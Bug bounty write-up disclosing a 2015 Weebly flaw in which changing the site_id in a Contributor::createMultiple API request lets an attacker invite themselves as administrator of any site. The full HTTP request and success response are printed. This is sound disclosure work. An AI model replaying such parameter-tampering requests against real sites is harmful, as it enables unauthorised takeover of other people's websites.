arrow-left arrow-right brightness-2 chevron-left chevron-right circle-half-full dots-horizontal facebook-box facebook loader magnify menu-down rss-box star twitter-box twitter white-balance-sunny window-close
Hacking Weebly Websites
2 min read Bug Bounty

Hacking Weebly Websites

Hacking Weebly Websites

Weebly is a web-hosting service that allows the user to “drag-and-drop” while using their website builder.It lets people create unique websites, online stores, or blogs, with ease. With 30 Million users as of 2016 and 250 Million unique visitors each month, it is now one of the most used platform around the globe.

Summary

Weebly was vulnerable to Domain Takeover or Hijacking of Weebly Websites by adding an Administrator to any weebly websites.

Proof of Concept

To exploit the vulnerability, I created two (2) different accounts with two (2) different weebly website.

  • Account X - Attacker
  • Account Y - Target

And each account has a weebly website.

  • X's site ID - 12345 (attacker.weebly.com)
  • Y's site ID - 24680 (ohhyeahphfudge.weebly.com)

First, using the attacker account and website I added an Administrator using an email address and captured the POST request through Burp.

POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com
Proxy-Connection: keep-alive
Content-Length: 247
Accept: application/json, text/javascript
Origin: http://www.weebly.com
X-Requested-With: XMLHttpRequest
x-wtok: [Removed]
Content-Type: application/json; charset=UTF-8
Referer: http://www.weebly.com/weebly/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Removed]

{
  "jsonrpc": "2.0",
  "method": "Contributor::createMultiple",
  "params": [
    {
      "role": "admin",
      "email": "[email protected]",
      "message": "HiJacking Weebly websites",
      "restrict_pages": false,
      "owner_id": "47812623",
      "site_id": "12345"
    }
  ],
  "id": 0
}

Apparently, when you invited someone to become an admin of a Weebly website, Weebly will automatically assign an owner_id and uses site_id as a reference for the website.

To invite yourself admin of other weebly website and hijack it, simply change the value of site_id from 12345 to your target's site_id=24680. The response should be like this:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26
GMT Server: Apache
Vary: Cookie,Accept-Encoding,User-Agent
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Host: app-64-16.intern.weebly.net
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 602
Content-Type: application/json
X-W-DC: SFO

{
  "jsonrpc": "2.0",
  "id": 0,
  "method": "Contributor::createMultiple",
  "result": {
    "success": true,
    "models": [
      {
        "id": "invitation-596276730608950492",
        "pending": true,
        "owner_id": "47812623",
        "user_id": null,
        "site_id": "24680",
        "email": "[email protected]",
        "last_login": false,
        "role": "admin",
        "display_role": "Administrator",
        "invitation_id": "596276730608950492",
        "invitation_used": null,
        "invitation_retracted": null,
        "message": "HiJacking Weebly websites",
        "restrict_pages": false,
        "allowed_pages": [],
        "allow_publish": true,
        "allow_stats": true,
        "allow_form_entries": true,
        "allow_blog_comments": true
      }
    ],
    "errors": []
  }
}

Then you should get an email:

You might also like...

Nov
04
2020

Spread Fake News on Facebook due to Design Issue (Next Level Content Injection)

3 min read
May
20
2020

Determine Facebook Page Admin through Facebook Like

2 min read
Jan
10
2019

User and Team Impersonation on HackTheBox

3 min read
Nov
28
2017

Hacking Trello’s iOS App

2 min read
Jan
10
2016

Download a copy of any Facebook Page

3 min read

Popular tags

Privilege Escalation OSCP-Like Machines Linux HackTheBox Bug Bounty